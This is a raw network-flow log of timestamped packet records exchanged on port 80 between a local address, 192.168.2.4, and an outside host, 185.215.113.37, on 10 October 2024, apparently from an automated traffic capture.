Oct 10, 2024 18:23:18.055856943 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055856943 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055861950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055880070 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055891991 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055906057 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055907011 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055910110 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055922985 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055938005 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055944920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055944920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055951118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.055982113 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.055982113 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.056500912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.056569099 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.056580067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.056588888 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.056617022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.056617022 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.056706905 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.056716919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.056735039 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.056749105 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.056766987 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.056766987 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.057214975 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.142271042 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142287016 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142424107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142443895 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.142469883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142482042 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.142486095 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142523050 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.142523050 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.142589092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142600060 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142617941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142622948 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.142628908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142647028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142657995 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.142657995 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.142709970 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.142848015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142858982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142879009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142891884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142908096 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.142909050 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.142909050 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.142930031 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.142930031 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.142997026 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143074036 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143085003 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143102884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143115997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143125057 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143125057 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143132925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143146992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143158913 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143172026 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143172026 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143198967 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143673897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143685102 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143702030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143714905 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143728018 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143728018 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143731117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143745899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143759012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143775940 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143775940 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143785000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143795967 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143812895 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143816948 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143816948 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143826008 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143842936 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143845081 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143845081 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143856049 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143871069 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143873930 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143873930 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143889904 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143913031 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143922091 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143939972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143953085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143969059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.143975019 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.143975019 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144001961 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144001961 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144057989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144068956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144087076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144098997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144109964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144109964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144114971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144129992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144136906 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144136906 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144140959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144159079 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144166946 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144166946 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144171000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144187927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144195080 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144195080 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144201040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144210100 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144242048 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144242048 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.144956112 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144970894 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144985914 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.144998074 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145014048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145026922 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145029068 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.145029068 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.145044088 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145056009 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145067930 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.145068884 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.145073891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145088911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145106077 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145118952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145122051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.145122051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.145136118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145150900 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.145162106 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.145179033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.145625114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145667076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145677090 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145699978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.145699978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.145728111 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.145792961 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.145991087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.176536083 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176564932 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176579952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176593065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176609993 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176623106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176640034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176637888 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.176637888 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.176654100 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176671982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176685095 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176693916 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.176693916 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.176702023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176717043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176747084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.176747084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.176887989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176898956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176918030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176928043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176947117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176951885 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.176953077 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.176959991 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176978111 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176990032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.176996946 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.176996946 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177006960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177021027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177038908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177052021 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177052021 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177052975 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177072048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177092075 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177092075 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177295923 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177330971 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177330971 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177396059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177406073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177427053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177442074 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177444935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177444935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177458048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177469015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177479029 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177479029 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177484989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177508116 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177511930 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177511930 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177521944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177537918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177551031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177558899 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177558899 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177567959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177581072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177598000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177602053 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177602053 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177609921 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177628040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177651882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177651882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177820921 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177834988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177854061 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177854061 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177858114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.177887917 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.177887917 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254008055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254029989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254048109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254072905 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254144907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254158020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254173994 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254175901 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254175901 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254187107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254204988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254230976 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254230976 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254276037 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254295111 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254308939 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254308939 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254316092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254327059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254343987 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254347086 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254347086 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254375935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254375935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254637957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254650116 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254667997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254682064 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254683971 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254683971 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254694939 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254710913 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.254718065 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254718065 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.254736900 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255129099 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255140066 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255157948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255163908 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255172014 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255182981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255188942 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255188942 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255215883 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255215883 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255409956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255424023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255440950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255441904 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255461931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255471945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255475998 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255475998 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255490065 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255501032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255505085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255505085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255517960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255532026 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255532980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255533934 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255543947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255549908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255598068 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255740881 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255939960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255949974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255970001 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.255975008 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.255987883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256001949 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256001949 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256001949 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256017923 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256032944 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256032944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256032944 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256047964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256066084 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256066084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256066084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256076097 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256088972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256104946 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256104946 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256109953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256122112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256125927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256140947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256159067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256156921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256156921 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256171942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256189108 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256189108 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256388903 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256398916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256416082 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256417036 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256417036 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.256434917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.256444931 CEST	80	49731	185.215.113.37	192.168.2.4
